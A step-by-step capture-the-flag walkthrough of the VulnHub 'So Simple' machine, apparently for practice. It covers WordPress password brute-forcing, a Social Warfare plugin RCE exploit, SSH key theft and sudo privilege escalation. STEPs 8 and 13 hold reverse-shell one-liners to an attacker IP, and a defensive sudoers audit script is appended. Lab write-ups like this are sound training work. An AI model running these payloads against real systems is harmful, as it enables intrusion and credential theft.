Machine Link : https://www.vulnhub.com/entry/so-simple-1,515/
STEP1
arp-scan -l
FINDING
192.168.31.103
----------------------------------------------------------------------------------------------------------
STEP2
nmap 192.168.31.103 -p- -Pn -A -T4 -sSV
FINDING
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
----------------------------------------------------------------------------------------------------------
STEP3
dirb http://192.168.31.103/
FINDING
http://192.168.31.103/wordpress/index.php
http://192.168.31.103/wordpress/wp-admin/admin.php
The site runs WordPress.
----------------------------------------------------------------------------------------------------------
STEP4
wpscan --url http://192.168.31.103/wordpress/ -e at -e ap -e u
FINDING
Upload directory has listing enabled: http://192.168.31.103/wordpress/wp-content/uploads/
admin -- user
max -- user
----------------------------------------------------------------------------------------------------------
STEP5
wpscan --url http://192.168.31.103/wordpress -U max,admin -P /usr/share/wordlists/rockyou.txt
FINDING
plugins -- social-warfare -- The version is out of date -- Version: 3.5.0
plugins -- simple-cart-solution -- The version is out of date -- Version: 0.2.0
[SUCCESS] - max / opensesame -- password found
----------------------------------------------------------------------------------------------------------
STEP6
Logging in as max does not give anything useful, so look at the outdated plugins instead.
searchsploit Social Warfare 3.5
FINDING
WordPress Plugin Social Warfare 3.5.3 - Remote Code Execution | php/webapps/46794.py
----------------------------------------------------------------------------------------------------------
STEP7
download the exploit from exploitdb
python2 46794.py -h
FINDING
Options:
-h, --help show this help message and exit
-t TARGET, --target=TARGET
Target Link
--payload-uri=PAYLOAD
URI where the file payload.txt is located.
----------------------------------------------------------------------------------------------------------
STEP8
create payload.txt on the desktop containing -- <pre>system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.31.28 4321 >/tmp/f")</pre>
start a python3 web server to serve it -- python3 -m http.server 80
in a new terminal start the listener -- nc -nvlp 4321
on another terminal deliver the payload -- python2 46794.py -t http://192.168.31.103/wordpress/ --payload-uri=http://192.168.31.28/payload.txt
and the shell arrives on the nc listener
----------------------------------------------------------------------------------------------------------
STEP9
cd /home
ls -la
cat personal.txt
FINDING
SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA=
https://hashes.com/en/decrypt/hash
SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA=:Hahahahaha, it's not that easy !!!
----------------------------------------------------------------------------------------------------------
STEP10
cd max
ls -la
cd .ssh
cat id_rsa
copy it and paste it into a file on the local machine
chmod 600 id_rsa
----------------------------------------------------------------------------------------------------------
STEP11
ssh max@192.168.31.103 -i id_rsa
ls -la
cat user.txt
073dafccfe902526cee753455ff1dbb0
sudo -l
(steven) NOPASSWD: /usr/sbin/service
----------------------------------------------------------------------------------------------------------
STEP12
sudo -u steven /usr/sbin/service ../../bin/sh
whoami
steven
sudo -l
(root) NOPASSWD: /opt/tools/server-health.sh
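Both sudo rules above, the NOPASSWD rule on /usr/sbin/service (which accepts a relative path such as ../../bin/sh) and the NOPASSWD rule on a root-run script whose path does not exist yet, are exactly what a local sudoers audit should flag. The following is an added example, not part of the original writeup; the passthrough set, the sample `sudo -l` text and the fake filesystem state are constructed assumptions:

```python
import os
import re

# Binaries that, run via sudo, execute a program named by the caller; on this box
# /usr/sbin/service turns "../../bin/sh" (relative to /etc/init.d) into /bin/sh.
PASSTHROUGH_BINARIES = {"/usr/sbin/service"}  # assumption: extend from your own baseline

# Per-rule lines of `sudo -l` look like "(runas) NOPASSWD: /absolute/command".
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)")

def path_is_hijackable(path, exists=os.path.exists, writable=os.access):
    """True when a local user could control what runs at `path`: the file or its
    parent is writable, or it is missing and its nearest existing ancestor is."""
    probe = path
    while not exists(probe):
        parent = os.path.dirname(probe)
        if parent == probe:   # walked up to "/" without hitting an existing path
            return False
        probe = parent
    if probe == path:
        return writable(path, os.W_OK) or writable(os.path.dirname(path), os.W_OK)
    return writable(probe, os.W_OK)

def audit_sudo_output(text, exists=os.path.exists, writable=os.access):
    """Return (runas, command, reason) for each NOPASSWD rule worth fixing."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line.strip())
        if not m or "NOPASSWD" not in m.group("tags"):
            continue
        runas, cmd = m.group("runas"), m.group("cmd")
        if cmd in PASSTHROUGH_BINARIES:
            findings.append((runas, cmd, "passthrough binary: argument picks the program"))
        elif path_is_hijackable(cmd, exists, writable):
            findings.append((runas, cmd, "target missing or writable: caller controls it"))
    return findings

# Constructed `sudo -l` output mirroring the two rules found on the box.
SAMPLE_SUDO_L = """User steven may run the following commands on so-simple:
    (root) NOPASSWD: /opt/tools/server-health.sh
User max may run the following commands on so-simple:
    (steven) NOPASSWD: /usr/sbin/service
    (root) /usr/bin/apt
"""
# Constructed filesystem state: /opt/tools does not exist yet and /opt is writable.
FAKE_EXISTS = {"/", "/opt", "/usr", "/usr/sbin", "/usr/sbin/service"}
FAKE_WRITABLE = {"/opt"}

def demo():
    return audit_sudo_output(SAMPLE_SUDO_L, exists=lambda p: p in FAKE_EXISTS,
                             writable=lambda p, mode: p in FAKE_WRITABLE)
```

On a real host call `audit_sudo_output(subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout)` with the default `os.path.exists` and `os.access` arguments.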
----------------------------------------------------------------------------------------------------------
STEP13
create the folder /opt/tools and, inside it, the script server-health.sh
cd /opt
mkdir tools
cd tools
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.31.28 4322 >/tmp/f" > server-health.sh
chmod +x server-health.sh
(start the listener from STEP14 first, then run)
sudo /opt/tools/server-health.sh
----------------------------------------------------------------------------------------------------------
STEP14
open nc in a new terminal
nc -nvlp 4322
whoami
root
cd /root
cat flag.txt
(large ASCII-art banner, collapsed by extraction, reading approximately: Congratz! You've pwned So Simple!)
Easy box right? Hope youve had fun! Show me the flag on Twitter @roelvb79
----------------------------------------------------------------------------------------------------------